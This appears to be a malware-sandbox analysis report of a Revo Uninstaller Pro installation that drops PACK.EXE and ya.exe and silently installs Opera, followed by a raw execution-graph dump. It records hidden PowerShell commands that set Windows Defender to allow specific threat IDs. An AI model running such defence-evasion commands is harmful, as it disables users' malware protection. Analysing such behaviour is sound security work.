                                                                                                                                                                          Commandline:"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:10'103'264 bytes
                                                                                                                                                                          MD5 hash:216B49B7EB7BE44D7ED7367F3725285F
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000A.00000000.2096953602.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:12
                                                                                                                                                                          Start time:11:53:08
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"
                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                          File size:25'576'112 bytes
                                                                                                                                                                          MD5 hash:EE15BFE5A394ADBFB087B053A6A72821
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:14
                                                                                                                                                                          Start time:11:53:14
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:cmd.exe /c "C:\Users\user\AppData\Local\Temp\PACK.EXE" -p123
                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:15
                                                                                                                                                                          Start time:11:53:14
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:16
                                                                                                                                                                          Start time:11:53:14
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\PACK.EXE
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\PACK.EXE -p123
                                                                                                                                                                          Imagebase:0xfd0000
                                                                                                                                                                          File size:419'886 bytes
                                                                                                                                                                          MD5 hash:A868E9C0A97C2EF80602C0F6634913F8
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 30%, ReversingLabs
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:17
                                                                                                                                                                          Start time:11:53:15
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:18
                                                                                                                                                                          Start time:11:53:15
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:19
                                                                                                                                                                          Start time:11:53:17
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:10'103'264 bytes
                                                                                                                                                                          MD5 hash:216B49B7EB7BE44D7ED7367F3725285F
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:21
                                                                                                                                                                          Start time:11:53:28
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:22
                                                                                                                                                                          Start time:11:53:28
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:23
                                                                                                                                                                          Start time:11:53:42
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
                                                                                                                                                                          Imagebase:0x3a0000
                                                                                                                                                                          File size:433'152 bytes
                                                                                                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:24
                                                                                                                                                                          Start time:11:53:42
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:26
                                                                                                                                                                          Start time:11:53:58
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe"
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          File size:174'444 bytes
                                                                                                                                                                          MD5 hash:7ACCFDE96C04320BA099144A7BE710CC
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 25%, ReversingLabs
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:27
                                                                                                                                                                          Start time:11:54:05
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Users\user\Downloads\OperaSetup.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
                                                                                                                                                                          Imagebase:0x340000
                                                                                                                                                                          File size:2'227'280 bytes
                                                                                                                                                                          MD5 hash:5A1105F1C25A60B128D45EC03041BF48
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:28
                                                                                                                                                                          Start time:11:54:07
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --silent --allusers=0 --server-tracking-blob=NjAxODRkYTk2NmVjNjFhZDRjZmFkOGU5NDAyOGEwYWNlYzViZGE5ZjVkYTg0YmUwMzJiZDRjZWFjZGQ4ODM0Njp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwidGltZXN0YW1wIjoiMTczMzc2MzI0Mi4yNjIyIiwidXNlcmFnZW50IjoiTlNJU19JbmV0YyAoTW96aWxsYSkiLCJ1dG0iOnsiY2FtcGFpZ24iOiJyMTAiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJEV05MU1QifSwidXVpZCI6ImNkOWY4MWM2LTcyOWEtNGQ5NS1hYzcxLTFlYmJhNzViZmM3YiJ9
                                                                                                                                                                          Imagebase:0xd0000
                                                                                                                                                                          File size:5'740'952 bytes
                                                                                                                                                                          MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:29
                                                                                                                                                                          Start time:11:54:07
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6c2f7cf4,0x6c2f7d00,0x6c2f7d0c
                                                                                                                                                                          Imagebase:0xd0000
                                                                                                                                                                          File size:5'740'952 bytes
                                                                                                                                                                          MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:30
                                                                                                                                                                          Start time:11:54:08
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version
                                                                                                                                                                          Imagebase:0x190000
                                                                                                                                                                          File size:5'740'952 bytes
                                                                                                                                                                          MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:31
                                                                                                                                                                          Start time:11:54:09
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=8040 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209115409" --session-guid=57f4b7c1-1875-4c3d-aada-fe1e595f9b71 --server-tracking-blob="ZTEzMzE3M2U4ODhkN2Y3YmE0ODQ3NmYwNmNlNmJmMDE4NmY4MzAzYmNmNWRmMWYyYmVlYWJmNDExZjE1ZDAzODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMzNzYzMjQyLjI2MjIiLCJ1c2VyYWdlbnQiOiJOU0lTX0luZXRjIChNb3ppbGxhKSIsInV0bSI6eyJjYW1wYWlnbiI6InIxMCIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6IkRXTkxTVCJ9LCJ1dWlkIjoiY2Q5ZjgxYzYtNzI5YS00ZDk1LWFjNzEtMWViYmE3NWJmYzdiIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1806000000000000
                                                                                                                                                                          Imagebase:0xd0000
                                                                                                                                                                          File size:5'740'952 bytes
                                                                                                                                                                          MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:32
                                                                                                                                                                          Start time:11:54:10
                                                                                                                                                                          Start date:09/12/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x31c,0x320,0x330,0x2f8,0x334,0x6b717cf4,0x6b717d00,0x6b717d0c
                                                                                                                                                                          Imagebase:0xd0000
                                                                                                                                                                          File size:5'740'952 bytes
                                                                                                                                                                          MD5 hash:F9DA76E8D7DB633AB031EE5AC59BB55E
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Reset < >

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:32.3%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:16.2%
                                                                                                                                                                            Total number of Nodes:1392
                                                                                                                                                                            Total number of Limit Nodes:52
                                                                                                                                                                            execution_graph 3257 401bc0 3258 401c11 3257->3258 3264 401bcd 3257->3264 3259 401c16 3258->3259 3260 401c3b GlobalAlloc 3258->3260 3270 401c56 3259->3270 3276 4066a2 lstrcpynW 3259->3276 3277 4066df 3260->3277 3261 4023af 3263 4066df 21 API calls 3261->3263 3267 4023bc 3263->3267 3264->3261 3265 401be4 3264->3265 3294 4066a2 lstrcpynW 3265->3294 3296 405d02 3267->3296 3269 401c28 GlobalFree 3269->3270 3272 401bf3 3295 4066a2 lstrcpynW 3272->3295 3274 401c02 3300 4066a2 lstrcpynW 3274->3300 3276->3269 3279 4066ea 3277->3279 3278 406931 3280 40694a 3278->3280 3323 4066a2 lstrcpynW 3278->3323 3279->3278 3282 406902 lstrlenW 3279->3282 3286 4067fb GetSystemDirectoryW 3279->3286 3287 4066df 15 API calls 3279->3287 3288 406811 GetWindowsDirectoryW 3279->3288 3289 4066df 15 API calls 3279->3289 3290 4068a3 lstrcatW 3279->3290 3293 406873 SHGetPathFromIDListW CoTaskMemFree 3279->3293 3301 406570 3279->3301 3306 406a96 GetModuleHandleA 3279->3306 3312 406950 3279->3312 3321 4065e9 wsprintfW 3279->3321 3322 4066a2 lstrcpynW 3279->3322 3280->3270 3282->3279 3286->3279 3287->3282 3288->3279 3289->3279 3290->3279 3293->3279 3294->3272 3295->3274 3297 405d17 3296->3297 3298 405d63 3297->3298 3299 405d2b MessageBoxIndirectW 3297->3299 3298->3270 3299->3298 3300->3270 3324 40650f 3301->3324 3304 4065a4 RegQueryValueExW RegCloseKey 3305 4065d4 3304->3305 3305->3279 3307 406ab2 3306->3307 3308 406abc GetProcAddress 3306->3308 3328 406a26 GetSystemDirectoryW 3307->3328 3310 406acb 3308->3310 3310->3279 3311 406ab8 3311->3308 3311->3310 3319 40695d 3312->3319 3313 4069d3 3314 4069d8 CharPrevW 3313->3314 3317 4069f9 3313->3317 3314->3313 3315 4069c6 CharNextW 3315->3313 3315->3319 3317->3279 3318 4069b2 CharNextW 3318->3319 3319->3313 3319->3315 3319->3318 3320 4069c1 CharNextW 3319->3320 3331 405f9e 3319->3331 3320->3315 3321->3279 3322->3279 3323->3280 3325 40651e 3324->3325 3326 406522 3325->3326 3327 406527 RegOpenKeyExW 3325->3327 3326->3304 3326->3305 3327->3326 3329 406a48 wsprintfW LoadLibraryExW 3328->3329 3329->3311 3332 405fa4 3331->3332 3333 405fba 3332->3333 3334 405fab CharNextW 3332->3334 3333->3319 3334->3332 4379 406dc0 4381 406c44 4379->4381 4380 4075af 4381->4380 4382 406cc5 GlobalFree 4381->4382 4383 406cce GlobalAlloc 4381->4383 4384 406d45 GlobalAlloc 4381->4384 4385 406d3c GlobalFree 4381->4385 4382->4383 4383->4380 4383->4381 4384->4380 4384->4381 4385->4384 4386 402641 4387 402dcb 21 API calls 4386->4387 4388 402648 4387->4388 4391 406192 GetFileAttributesW CreateFileW 4388->4391 4390 402654 4391->4390 3497 4025c3 3508 402e0b 3497->3508 3501 4025d6 3502 4025f2 RegEnumKeyW 3501->3502 3503 4025fe RegEnumValueW 3501->3503 3506 402953 3501->3506 3504 40261a RegCloseKey 3502->3504 3503->3504 3505 402613 3503->3505 3504->3506 3505->3504 3509 402dcb 21 API calls 3508->3509 3510 402e22 3509->3510 3511 40650f RegOpenKeyExW 3510->3511 3512 4025cd 3511->3512 3513 402da9 3512->3513 3514 4066df 21 API calls 3513->3514 3515 402dbe 3514->3515 3515->3501 4392 4015c8 4393 402dcb 21 API calls 4392->4393 4394 4015cf SetFileAttributesW 4393->4394 4395 4015e1 4394->4395 3531 401fc9 3532 402dcb 21 API calls 3531->3532 3533 401fcf 3532->3533 3534 405727 28 API calls 3533->3534 3535 401fd9 3534->3535 3544 405c85 CreateProcessW 3535->3544 3540 402953 3541 401ff4 3543 402002 CloseHandle 3541->3543 3552 4065e9 wsprintfW 3541->3552 3543->3540 3545 401fdf 3544->3545 3546 405cb8 CloseHandle 3544->3546 3545->3540 3545->3543 3547 406b41 WaitForSingleObject 3545->3547 3546->3545 3548 406b5b 3547->3548 3549 406b6d GetExitCodeProcess 3548->3549 3553 406ad2 3548->3553 3549->3541 3552->3543 3554 406aef PeekMessageW 3553->3554 3555 406ae5 DispatchMessageW 3554->3555 3556 406aff WaitForSingleObject 3554->3556 3555->3554 3556->3548 3557 4014cb 3558 405727 28 API calls 3557->3558 3559 4014d2 3558->3559 4403 404acb 4404 404b01 4403->4404 4405 404adb 4403->4405 4406 404688 8 API calls 4404->4406 4407 404621 22 API calls 4405->4407 4408 404b0d 4406->4408 4409 404ae8 SetDlgItemTextW 4407->4409 4409->4404 3560 40254f 3561 402e0b 21 API calls 3560->3561 3562 402559 3561->3562 3563 402dcb 21 API calls 3562->3563 3564 402562 3563->3564 3565 40256d RegQueryValueExW 3564->3565 3567 402953 3564->3567 3566 40258d 3565->3566 3570 402593 RegCloseKey 3565->3570 3566->3570 3571 4065e9 wsprintfW 3566->3571 3570->3567 3571->3570 3572 4021cf 3573 402dcb 21 API calls 3572->3573 3574 4021d6 3573->3574 3575 402dcb 21 API calls 3574->3575 3576 4021e0 3575->3576 3577 402dcb 21 API calls 3576->3577 3578 4021ea 3577->3578 3579 402dcb 21 API calls 3578->3579 3580 4021f4 3579->3580 3581 402dcb 21 API calls 3580->3581 3582 4021fe 3581->3582 3583 40223d CoCreateInstance 3582->3583 3584 402dcb 21 API calls 3582->3584 3587 40225c 3583->3587 3584->3583 3586 40231b 3587->3586 3588 401423 3587->3588 3589 405727 28 API calls 3588->3589 3590 401431 3589->3590 3590->3586 4410 40204f 4411 402dcb 21 API calls 4410->4411 4412 402056 4411->4412 4413 406a96 5 API calls 4412->4413 4414 402065 4413->4414 4415 402081 GlobalAlloc 4414->4415 4417 4020f1 4414->4417 4416 402095 4415->4416 4415->4417 4418 406a96 5 API calls 4416->4418 4419 40209c 4418->4419 4420 406a96 5 API calls 4419->4420 4421 4020a6 4420->4421 4421->4417 4425 4065e9 wsprintfW 4421->4425 4423 4020df 4426 4065e9 wsprintfW 4423->4426 4425->4423 4426->4417 4427 401a55 4428 402dcb 21 API calls 4427->4428 4429 401a5e ExpandEnvironmentStringsW 4428->4429 4430 401a72 4429->4430 4432 401a85 4429->4432 4431 401a77 lstrcmpW 4430->4431 4430->4432 4431->4432 3822 4014d7 3823 402da9 21 API calls 3822->3823 3824 4014dd Sleep 3823->3824 3826 402c4f 3824->3826 4433 404757 lstrcpynW lstrlenW 4439 4023d7 4440 4023df 4439->4440 4443 4023e5 4439->4443 4441 402dcb 21 API calls 4440->4441 4441->4443 4442 4023f3 4445 402401 4442->4445 4446 402dcb 21 API calls 4442->4446 4443->4442 4444 402dcb 21 API calls 4443->4444 4444->4442 4447 402dcb 21 API calls 4445->4447 4446->4445 4448 40240a WritePrivateProfileStringW 4447->4448 4449 402459 4450 402461 4449->4450 4451 40248c 4449->4451 4453 402e0b 21 API calls 4450->4453 4452 402dcb 21 API calls 4451->4452 4454 402493 4452->4454 4455 402468 4453->4455 4460 402e89 4454->4460 4457 4024a0 4455->4457 4458 402dcb 21 API calls 4455->4458 4459 402479 RegDeleteValueW RegCloseKey 4458->4459 4459->4457 4461 402e96 4460->4461 4462 402e9d 4460->4462 4461->4457 4462->4461 4464 402ece 4462->4464 4465 40650f RegOpenKeyExW 4464->4465 4466 402efc 4465->4466 4467 402fa6 4466->4467 4468 402f0c RegEnumValueW 4466->4468 4469 402f2f 4466->4469 4467->4461 4468->4469 4470 402f96 RegCloseKey 4468->4470 4469->4470 4471 402f6b RegEnumKeyW 4469->4471 4472 402f74 RegCloseKey 4469->4472 4475 402ece 6 API calls 4469->4475 4470->4467 4471->4469 4471->4472 4473 406a96 5 API calls 4472->4473 4474 402f84 4473->4474 4474->4467 4476 402f88 RegDeleteKeyW 4474->4476 4475->4469 4476->4467 4477 40175a 4478 402dcb 21 API calls 4477->4478 4479 401761 SearchPathW 4478->4479 4480 40177c 4479->4480 4481 401d5d 4482 402da9 21 API calls 4481->4482 4483 401d64 4482->4483 4484 402da9 21 API calls 4483->4484 4485 401d70 GetDlgItem 4484->4485 4486 40265d 4485->4486 4494 4047e0 4495 4047f8 4494->4495 4499 404912 4494->4499 4500 404621 22 API calls 4495->4500 4496 40497c 4497 404a46 4496->4497 4498 404986 GetDlgItem 4496->4498 4505 404688 8 API calls 4497->4505 4501 4049a0 4498->4501 4502 404a07 4498->4502 4499->4496 4499->4497 4503 40494d GetDlgItem SendMessageW 4499->4503 4504 40485f 4500->4504 4501->4502 4506 4049c6 SendMessageW LoadCursorW SetCursor 4501->4506 4502->4497 4507 404a19 4502->4507 4527 404643 KiUserCallbackDispatcher 4503->4527 4509 404621 22 API calls 4504->4509 4516 404a41 4505->4516 4528 404a8f 4506->4528 4511 404a2f 4507->4511 4512 404a1f SendMessageW 4507->4512 4514 40486c CheckDlgButton 4509->4514 4511->4516 4517 404a35 SendMessageW 4511->4517 4512->4511 4513 404977 4518 404a6b SendMessageW 4513->4518 4525 404643 KiUserCallbackDispatcher 4514->4525 4517->4516 4518->4496 4520 40488a GetDlgItem 4526 404656 SendMessageW 4520->4526 4522 4048a0 SendMessageW 4523 4048c6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4048bd GetSysColor 4522->4524 4523->4516 4524->4523 4525->4520 4526->4522 4527->4513 4531 405cc8 ShellExecuteExW 4528->4531 4530 4049f5 LoadCursorW SetCursor 4530->4502 4531->4530 4532 402663 4533 402692 4532->4533 4534 402677 4532->4534 4536 4026c2 4533->4536 4537 402697 4533->4537 4535 402da9 21 API calls 4534->4535 4547 40267e 4535->4547 4539 402dcb 21 API calls 4536->4539 4538 402dcb 21 API calls 4537->4538 4540 40269e 4538->4540 4541 4026c9 lstrlenW 4539->4541 4549 4066c4 WideCharToMultiByte 4540->4549 4541->4547 4543 4026b2 lstrlenA 4543->4547 4544 40270c 4545 4026f6 4545->4544 4546 406244 WriteFile 4545->4546 4546->4544 4547->4544 4547->4545 4548 406273 5 API calls 4547->4548 4548->4545 4549->4543 3939 403665 SetErrorMode GetVersionExW 3940 4036f1 3939->3940 3941 4036b9 GetVersionExW 3939->3941 3942 403748 3940->3942 3943 406a96 5 API calls 3940->3943 3941->3940 3944 406a26 3 API calls 3942->3944 3943->3942 3945 40375e lstrlenA 3944->3945 3945->3942 3946 40376e 3945->3946 3947 406a96 5 API calls 3946->3947 3948 403775 3947->3948 3949 406a96 5 API calls 3948->3949 3950 40377c 3949->3950 3951 406a96 5 API calls 3950->3951 3952 403788 #17 OleInitialize SHGetFileInfoW 3951->3952 4027 4066a2 lstrcpynW 3952->4027 3955 4037d7 GetCommandLineW 4028 4066a2 lstrcpynW 3955->4028 3957 